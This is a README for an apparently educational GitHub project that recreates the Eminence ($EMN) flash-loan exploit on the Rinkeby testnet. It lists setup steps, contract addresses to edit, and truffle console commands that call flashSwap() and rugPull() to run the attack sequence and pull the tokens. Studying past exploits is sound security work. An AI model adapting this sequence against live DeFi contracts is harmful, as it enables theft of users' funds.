For purely educational purposes, I've put together what I think was in the smart contract that drained $15M out of $EMN. The swap rates are a bit skewered on testnet which kills the arb exploit but the flash loan sequence is the same.
Great explanation of the $EMN exploit here
Note: All my stuff is unaudited. You should always assume there's malicious code in here until proven otherwise. Don't test this in prod.
- Clone this repo
git clone https://github.com/fifikobayashi/EMN-Exploit-study
- Install dependencies
npm i --save @uniswap/v2-core
npm i --save @uniswap/v2-periphery
npm install dotenv
npm install --save truffle-hdwallet-provider
- Setup your .env with your PKs and end points to match truffle-config.js
- Setup your .gitignore to hide your .env (Important)
- Adjust truffle-config.js to point to your desired environment for deployment
- Deploy /contracts/BondingCurve.sol manually
- Adjust the BondingCurve and IERC20 DAI addresses in /contracts/EminenceCurrencyEMN.sol
BondingCurve constant public CURVE = BondingCurve(0x8a8709cfB1b00D88F9F61eaa4a5e3aDC118E5Fc4);
...
IERC20 constant public DAI = IERC20(0xc7AD46e0b8a400Bb3C915120d284AafbA8fc4735);
- Deploy /contracts/EminenceCurrencyEMN.sol manually
- Adjust the BondingCurve and EMN token addresses in /contracts/EminenceCurrencyEaave.sol
BondingCurve constant public CURVE = BondingCurve(0x8a8709cfB1b00D88F9F61eaa4a5e3aDC118E5Fc4);
...
EminenceCurrencyEaave constant public EMN = EminenceCurrencyEaave(0xbf17593c6B3Bf351cb8C33be6e753aF8eD41Fe01);
- Deploy /contracts/EminenceCurrencyEaave.sol manually
- Adjust the execute() function in /contracts/EmnExploitStudy.sol to reference the deployed EMN and eAAVE contracts
// change the two addresses below with your own deployed EMN and eAAVE contracts
address EmnAddress = address(0xbf17593c6B3Bf351cb8C33be6e753aF8eD41Fe01);
address eAaveAddress = address(0xf9325bD4B7249fA70ce37fa8d80426a27675a49e);
- Compile and deploy /contracts/EmnExploitStudy.sol via this truffle project
truffle migrate --network rinkeby --skipDryRun
- Send some Rinkeby DAI to this the EmnExploitStudy contract you just deployed to cover UniswapV2's 0.3% flash swap fee.
- Jump on console and execute:
truffle console --network rinkeby
EmnExploitStudy.deployed().then(function(instance){return instance.flashSwap()});
- Pull all tokens from contract to you.
EmnExploitStudy.deployed().then(function(instance){return instance.rugPull()});
Successful execution on Rinkeby testnet
If you found this useful and would like to send me some gas money:
0xef03254aBC88C81Cb822b5E4DCDf22D55645bCe6
Thanks, @fifikobayashi.